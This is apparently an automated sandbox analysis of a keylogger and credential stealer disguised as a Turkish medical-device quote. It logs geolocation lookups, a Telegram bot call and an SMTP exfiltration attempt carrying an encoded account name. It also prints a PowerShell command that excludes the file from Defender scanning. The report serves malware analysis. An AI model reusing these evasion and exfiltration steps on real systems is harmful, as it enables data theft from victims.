                                                                                                                        Content-Type: text/xml
                                                                                                                        Content-Length: 362
                                                                                                                        Connection: close
                                                                                                                        Cache-Control: max-age=31536000
                                                                                                                        CF-Cache-Status: HIT
                                                                                                                        Age: 2469
                                                                                                                        Last-Modified: Tue, 10 Dec 2024 08:51:17 GMT
                                                                                                                        Accept-Ranges: bytes
                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=pHYDRyoyf%2B%2BuGAnSJfeBUvLQ%2B7Zr29S6EmiiB5CLA3qeaR6N2a0RkEocAKrQXYZH8vegP1qryUuYUbH9dm5Y5sdNMgAu%2BMw%2Fd0JqElvOO1Ae0BlM3tlosJbAxHnQUvNnfURyIQCC"}],"group":"cf-nel","max_age":604800}
                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                        Server: cloudflare
                                                                                                                        CF-RAY: 8efc3a489b93c466-EWR
                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1578&min_rtt=1568&rtt_var=609&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1767554&cwnd=216&unsent_bytes=0&cid=6061b5409b21dd6d&ts=450&x=0"
                                                                                                                        2024-12-10 09:32:26 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 37 35 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                        Data Ascii: <Response><IP>8.46.123.175</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                        2192.168.2.749743172.67.177.1344437844C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exe
                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                        2024-12-10 09:32:30 UTC61OUTGET /xml/8.46.123.175 HTTP/1.1
                                                                                                                        Host: reallyfreegeoip.org
                                                                                                                        2024-12-10 09:32:31 UTC872INHTTP/1.1 200 OK
                                                                                                                        Date: Tue, 10 Dec 2024 09:32:31 GMT
                                                                                                                        Content-Type: text/xml
                                                                                                                        Content-Length: 362
                                                                                                                        Connection: close
                                                                                                                        Cache-Control: max-age=31536000
                                                                                                                        CF-Cache-Status: HIT
                                                                                                                        Age: 2474
                                                                                                                        Last-Modified: Tue, 10 Dec 2024 08:51:17 GMT
                                                                                                                        Accept-Ranges: bytes
                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=JSdtmSBiNSxXeHHbzh9xvSV0kHaZRYmj%2B1Z5Y%2Bg2cWKFlM1jBMcv5KuSC2nfGsTAMiuFIRP0KXgqjtNCmoqNtQxv8D7FxFrtstjp2LBFImBG5CIL2UdoIX7QVCjKDRylDkKxWHDT"}],"group":"cf-nel","max_age":604800}
                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                        Server: cloudflare
                                                                                                                        CF-RAY: 8efc3a672dde7c9f-EWR
                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1988&min_rtt=1983&rtt_var=753&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1443400&cwnd=213&unsent_bytes=0&cid=cf22e8348f08c187&ts=455&x=0"
                                                                                                                        2024-12-10 09:32:31 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 37 35 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                        Data Ascii: <Response><IP>8.46.123.175</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                        3192.168.2.749770172.67.177.1344437844C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exe
                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                        2024-12-10 09:32:40 UTC85OUTGET /xml/8.46.123.175 HTTP/1.1
                                                                                                                        Host: reallyfreegeoip.org
                                                                                                                        Connection: Keep-Alive
                                                                                                                        2024-12-10 09:32:40 UTC882INHTTP/1.1 200 OK
                                                                                                                        Date: Tue, 10 Dec 2024 09:32:40 GMT
                                                                                                                        Content-Type: text/xml
                                                                                                                        Content-Length: 362
                                                                                                                        Connection: close
                                                                                                                        Cache-Control: max-age=31536000
                                                                                                                        CF-Cache-Status: HIT
                                                                                                                        Age: 2483
                                                                                                                        Last-Modified: Tue, 10 Dec 2024 08:51:17 GMT
                                                                                                                        Accept-Ranges: bytes
                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ZtP1Ae26xQv6yYOEIIgAl1rzBHICO%2FMamyJOPGv%2BE7yR9Js%2FCO%2B%2FwgWhu2tV9F1r%2BPBAzuxfiRQG1cEkHzl8qOHrxQNfZOHNCi3rjADSx1KcpsTHfX%2B5pvXl1fpCzyGd6HxUsvch"}],"group":"cf-nel","max_age":604800}
                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                        Server: cloudflare
                                                                                                                        CF-RAY: 8efc3aa31dfbf797-EWR
                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1601&min_rtt=1598&rtt_var=607&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1792510&cwnd=151&unsent_bytes=0&cid=dec6e88d8af02b40&ts=451&x=0"
                                                                                                                        2024-12-10 09:32:40 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 37 35 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                        Data Ascii: <Response><IP>8.46.123.175</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                        4192.168.2.749780172.67.177.1344437844C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exe
                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                        2024-12-10 09:32:44 UTC61OUTGET /xml/8.46.123.175 HTTP/1.1
                                                                                                                        Host: reallyfreegeoip.org
                                                                                                                        2024-12-10 09:32:45 UTC876INHTTP/1.1 200 OK
                                                                                                                        Date: Tue, 10 Dec 2024 09:32:44 GMT
                                                                                                                        Content-Type: text/xml
                                                                                                                        Content-Length: 362
                                                                                                                        Connection: close
                                                                                                                        Cache-Control: max-age=31536000
                                                                                                                        CF-Cache-Status: HIT
                                                                                                                        Age: 2487
                                                                                                                        Last-Modified: Tue, 10 Dec 2024 08:51:17 GMT
                                                                                                                        Accept-Ranges: bytes
                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=d49eS39cTej6Uf2D9gdhqwRPeswonsX3KFO%2FXywhO0HT5kZzwl3PhWsdFvpJaCl4oFwAi15RQ6YCOFZvP5kHkv68wzeG87E3WZ58pwzknX%2BZYcSxpJNM%2FlEWp%2BNd8mbH68prSQsa"}],"group":"cf-nel","max_age":604800}
                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                        Server: cloudflare
                                                                                                                        CF-RAY: 8efc3abcebd1439d-EWR
                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1562&min_rtt=1558&rtt_var=593&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1831869&cwnd=201&unsent_bytes=0&cid=313a5b84556c276c&ts=451&x=0"
                                                                                                                        2024-12-10 09:32:45 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 37 35 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                        Data Ascii: <Response><IP>8.46.123.175</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                        5192.168.2.749792172.67.177.1344437844C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exe
                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                        2024-12-10 09:32:49 UTC85OUTGET /xml/8.46.123.175 HTTP/1.1
                                                                                                                        Host: reallyfreegeoip.org
                                                                                                                        Connection: Keep-Alive
                                                                                                                        2024-12-10 09:32:49 UTC878INHTTP/1.1 200 OK
                                                                                                                        Date: Tue, 10 Dec 2024 09:32:49 GMT
                                                                                                                        Content-Type: text/xml
                                                                                                                        Content-Length: 362
                                                                                                                        Connection: close
                                                                                                                        Cache-Control: max-age=31536000
                                                                                                                        CF-Cache-Status: HIT
                                                                                                                        Age: 2492
                                                                                                                        Last-Modified: Tue, 10 Dec 2024 08:51:17 GMT
                                                                                                                        Accept-Ranges: bytes
                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Y%2F2bOCLdD6lgaCvDfndgBaV9T7BtJaNMomssE%2Fx2Tp5XXHjGJtq1OLEw2kRdersFSSkAq4Gc%2BD547mlu6Ki2491X8KZgnfURKcaZoYBw%2FKFIyqXN7eidWXmDl9Pb18hZEx%2BkEFXq"}],"group":"cf-nel","max_age":604800}
                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                        Server: cloudflare
                                                                                                                        CF-RAY: 8efc3ad82c5f0f95-EWR
                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1513&min_rtt=1513&rtt_var=569&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1922317&cwnd=169&unsent_bytes=0&cid=f0c98820c8590b2f&ts=461&x=0"
                                                                                                                        2024-12-10 09:32:49 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 37 35 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                        Data Ascii: <Response><IP>8.46.123.175</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                        6192.168.2.749804172.67.177.1344437844C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exe
                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                        2024-12-10 09:32:52 UTC85OUTGET /xml/8.46.123.175 HTTP/1.1
                                                                                                                        Host: reallyfreegeoip.org
                                                                                                                        Connection: Keep-Alive
                                                                                                                        2024-12-10 09:32:53 UTC874INHTTP/1.1 200 OK
                                                                                                                        Date: Tue, 10 Dec 2024 09:32:53 GMT
                                                                                                                        Content-Type: text/xml
                                                                                                                        Content-Length: 362
                                                                                                                        Connection: close
                                                                                                                        Cache-Control: max-age=31536000
                                                                                                                        CF-Cache-Status: HIT
                                                                                                                        Age: 2496
                                                                                                                        Last-Modified: Tue, 10 Dec 2024 08:51:17 GMT
                                                                                                                        Accept-Ranges: bytes
                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=gvv2yiOWopFHeZThCdGy3stdhyVSgG%2FLxWt9eEmQGTI2AKS%2Fn5lSvQaxpO2TOFvt16Wt1qWTtGp0UE6cppAx5s5aDM1RQMeWXAzv01gl%2BV5v0rm4aQtZiOrwXlNxTuCKiofpXS65"}],"group":"cf-nel","max_age":604800}
                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                        Server: cloudflare
                                                                                                                        CF-RAY: 8efc3aef595942ac-EWR
                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1721&min_rtt=1718&rtt_var=651&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1671436&cwnd=215&unsent_bytes=0&cid=664f6d843ab58228&ts=451&x=0"
                                                                                                                        2024-12-10 09:32:53 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 37 35 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                        Data Ascii: <Response><IP>8.46.123.175</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                        7192.168.2.749809149.154.167.2204437844C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exe
                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                        2024-12-10 09:32:54 UTC349OUTGET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:301389%0D%0ADate%20and%20Time:%2011/12/2024%20/%2010:44:44%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20301389%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1
                                                                                                                        Host: api.telegram.org
                                                                                                                        Connection: Keep-Alive
                                                                                                                        2024-12-10 09:32:55 UTC344INHTTP/1.1 404 Not Found
                                                                                                                        Server: nginx/1.18.0
                                                                                                                        Date: Tue, 10 Dec 2024 09:32:55 GMT
                                                                                                                        Content-Type: application/json
                                                                                                                        Content-Length: 55
                                                                                                                        Connection: close
                                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                        Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                        2024-12-10 09:32:55 UTC55INData Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 34 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 4e 6f 74 20 46 6f 75 6e 64 22 7d
                                                                                                                        Data Ascii: {"ok":false,"error_code":404,"description":"Not Found"}


                                                                                                                        SMTP Packets

                                                                                                                        TimestampSource PortDest PortSource IPDest IPCommands
                                                                                                                        Dec 10, 2024 10:33:04.152434111 CET5874983077.245.159.14192.168.2.7220-stilgar.wlsrv.com ESMTP Exim 4.96.2 #2 Tue, 10 Dec 2024 12:33:03 +0300
                                                                                                                        220-We do not authorize the use of this system to transport unsolicited,
                                                                                                                        220 and/or bulk e-mail.
                                                                                                                        Dec 10, 2024 10:33:04.162091017 CET49830587192.168.2.777.245.159.14EHLO 301389
                                                                                                                        Dec 10, 2024 10:33:04.603755951 CET5874983077.245.159.14192.168.2.7250-stilgar.wlsrv.com Hello 301389 [8.46.123.175]
                                                                                                                        250-SIZE 52428800
                                                                                                                        250-8BITMIME
                                                                                                                        250-PIPELINING
                                                                                                                        250-PIPECONNECT
                                                                                                                        250-AUTH PLAIN LOGIN
                                                                                                                        250-STARTTLS
                                                                                                                        250 HELP
                                                                                                                        Dec 10, 2024 10:33:04.605134010 CET49830587192.168.2.777.245.159.14AUTH login YmlsZ2lAYWRlbmRhbmlzbWFubGlrLmNvbS50cg==
                                                                                                                        Dec 10, 2024 10:33:05.046370983 CET5874983077.245.159.14192.168.2.7334 UGFzc3dvcmQ6
                                                                                                                        Dec 10, 2024 10:33:05.588809013 CET5874983077.245.159.14192.168.2.7235 Authentication succeeded
                                                                                                                        Dec 10, 2024 10:33:05.591938019 CET49830587192.168.2.777.245.159.14MAIL FROM:<bilgi@adendanismanlik.com.tr>
                                                                                                                        Dec 10, 2024 10:33:06.032866955 CET5874983077.245.159.14192.168.2.7250 OK
                                                                                                                        Dec 10, 2024 10:33:06.033063889 CET49830587192.168.2.777.245.159.14RCPT TO:<tiryaki.mehmetdemir@gmail.com>
                                                                                                                        Dec 10, 2024 10:33:06.477993965 CET5874983077.245.159.14192.168.2.7550 Outgoing mail from "bilgi@adendanismanlik.com.tr" has been suspended.

                                                                                                                        Statistics

                                                                                                                        CPU Usage

                                                                                                                        Click to jump to process

                                                                                                                        Memory Usage

                                                                                                                        Click to jump to process

                                                                                                                        High Level Behavior Distribution

                                                                                                                        Click to dive into process behavior distribution

                                                                                                                        Behavior

                                                                                                                        Click to jump to process

                                                                                                                        System Behavior

                                                                                                                        General

                                                                                                                        Target ID:1
                                                                                                                        Start time:04:32:11
                                                                                                                        Start date:10/12/2024
                                                                                                                        Path:C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exe
                                                                                                                        Wow64 process (32bit):true
                                                                                                                        Commandline:"C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exe"
                                                                                                                        Imagebase:0x830000
                                                                                                                        File size:865'792 bytes
                                                                                                                        MD5 hash:A4FF2584DAD5F40A71BDD4A108528492
                                                                                                                        Has elevated privileges:true
                                                                                                                        Has administrator privileges:true
                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                        Yara matches:
                                                                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000002.1343434926.0000000003E7E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                        • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000001.00000002.1343434926.0000000003E7E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                        • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000001.00000002.1343434926.0000000003E7E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                        • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000001.00000002.1343434926.0000000003E7E000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                                        Reputation:low
                                                                                                                        Has exited:true

                                                                                                                        General

                                                                                                                        Target ID:4
                                                                                                                        Start time:04:32:14
                                                                                                                        Start date:10/12/2024
                                                                                                                        Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                        Wow64 process (32bit):true
                                                                                                                        Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exe"
                                                                                                                        Imagebase:0x400000
                                                                                                                        File size:433'152 bytes
                                                                                                                        MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                                        Has elevated privileges:true
                                                                                                                        Has administrator privileges:true
                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                        Reputation:high
                                                                                                                        Has exited:true

                                                                                                                        General

                                                                                                                        Target ID:5
                                                                                                                        Start time:04:32:14
                                                                                                                        Start date:10/12/2024
                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                        Wow64 process (32bit):false
                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                        Imagebase:0x7ff75da10000
                                                                                                                        File size:862'208 bytes
                                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                        Has elevated privileges:true
                                                                                                                        Has administrator privileges:true
                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                        Reputation:high
                                                                                                                        Has exited:true

                                                                                                                        General

                                                                                                                        Target ID:6
                                                                                                                        Start time:04:32:14
                                                                                                                        Start date:10/12/2024
                                                                                                                        Path:C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exe
                                                                                                                        Wow64 process (32bit):true
                                                                                                                        Commandline:"C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exe"
                                                                                                                        Imagebase:0xa10000
                                                                                                                        File size:865'792 bytes
                                                                                                                        MD5 hash:A4FF2584DAD5F40A71BDD4A108528492
                                                                                                                        Has elevated privileges:true
                                                                                                                        Has administrator privileges:true
                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                        Yara matches:
                                                                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000006.00000002.3780343381.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                        • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000006.00000002.3780343381.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                        • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000006.00000002.3780343381.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                        • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000006.00000002.3780343381.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                                                        • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000006.00000002.3782735191.0000000002F8F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                        • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000006.00000002.3782735191.0000000002ED1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                        Reputation:low
                                                                                                                        Has exited:false

                                                                                                                        Disassembly

                                                                                                                        Reset < >

                                                                                                                          Execution Graph

                                                                                                                          Execution Coverage:9.6%
                                                                                                                          Dynamic/Decrypted Code Coverage:100%
                                                                                                                          Signature Coverage:0%
                                                                                                                          Total number of Nodes:212
                                                                                                                          Total number of Limit Nodes:17
